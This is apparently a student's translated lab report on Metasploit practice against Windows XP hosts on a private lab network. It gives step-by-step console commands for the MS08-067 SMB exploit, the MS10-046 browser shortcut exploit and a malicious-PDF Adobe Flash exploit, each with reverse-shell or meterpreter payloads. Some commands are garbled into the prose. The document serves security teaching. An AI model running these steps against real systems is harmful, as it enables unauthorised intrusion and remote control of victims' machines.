Exp5 MSF Basic Application
An Active Attack Practice, MS08-067
First use
msfconsoleenable msf terminalThen use the
search MS08-067search vulnerability, and the corresponding vulnerability module will be displayed
As shown in the figure:
According to the above figure, we enter
use exploit/windows/smb/ms08_067_netapiand select the corresponding moduleThen we can use
show payloads, to see the modules that can be used
As shown in the figure:
Then according to the above figure, in order to obtain the shell of the target machine, use
set payload generic/shell_reverse_tcpThen enter
show options, check the configuration information, know that we need to configure RHOST, LHOST, LPORT, target as shown in the
figure:
enter
set RHOST 192.168.241.138 set LHOST 192.168.241.134 set LPORT 5210configure
Then we use it again to
show optionsview the configuration information as shown in the
figure:
then
exploitmonitor
As shown in the figure:
- If the following situation occurs, turn off the firewall, it can be solved
Browser-targeted attacks, ms10_046
At first, I planned to do ms11_050 to attack the IE browser, but the IE8.0 version could not succeed. It may be that IE8.0 has fixed related vulnerabilities.
So I chose ms10_046 and first entered
search ms10_046Find Vulnerabilities
As shown in the figure:
Since we are going to attack the browser, we enter
use use exploit/windows/browser/ms10_046_shortcut_icon_Then we enter
show payloads, check the load to choose, here I still use the load in Experiment 1set payload generic/shell_reverse_tcp
As shown in the figure:
We
show optionsneed to configure the query using LPORT, LHOST, SRVHOSTenter
set SRVHOST 192.168.241.134 set LHOST 192.168.241.134 set LPORT 5210configure
Check the configuration information again
As shown in the figure:
- Then enter the
exploitgenerated URL
As shown in the figure:
Access the URL on the windows side, and the kali side is shown in the figure:
Enter
sessions, you can see a connection with ID 1 as shown in the
figure:
Then enter
session -i 1, connect to the connection with ID 1, enter the shell, and get it successfully.
As shown in the figure:
Attacks on Clients
First, use
search adobethe search method as shown in the
figure:
Then make a selection, I chose
use windows/fileformat/adobe_flashplayer_button
Then
set payload windows/meterpreter/reverse_tcp, set the load to be used, and useshow optionsit to view the information to be configured as shown in the
figure:
Enter the following code to configure LHOST, LPORT, FILENAME
set LHOST 192.168.241.134 set LPORT 5210 set FILENAME 20155210.pdfInput
exploit, generate 20155210.pdf file as shown in the
figure:
Enter
use exploit/multi/handler, enter listening, and set listening port, host numberOn the windows side, open 20155210.pdf and successfully connect back as shown in the
figure:
Auxiliary module application
- First use
show auxiliary, view auxiliary modules
I chose to
scanner/dns/dns_ampscan dnsEnter
show options, view configuration
input
exploitto monitor
basic problem
Explain what is exploit, payload, encode in your own words
Exploit: For the vulnerability of the target drone, use the backdoor in the target drone to attack the target drone
Payload: equivalent to the predecessor of shellcode, which is the template of the backdoor
encode: encode the payload
Experimental experience
We should try our best to update the latest version of the software and system, otherwise it will give hackers an opportunity.
For example, the experiments we do are all based on the XP system, but if we attack win7, 8, and 10, it will be invalid.
For example, when I was doing experiment 2, I wanted to do the example given by the teacher, but that loophole was not easy to use for IE8.0.
We do not have a penetration attack library that can target existing systems or software, and it is still far from actual combat.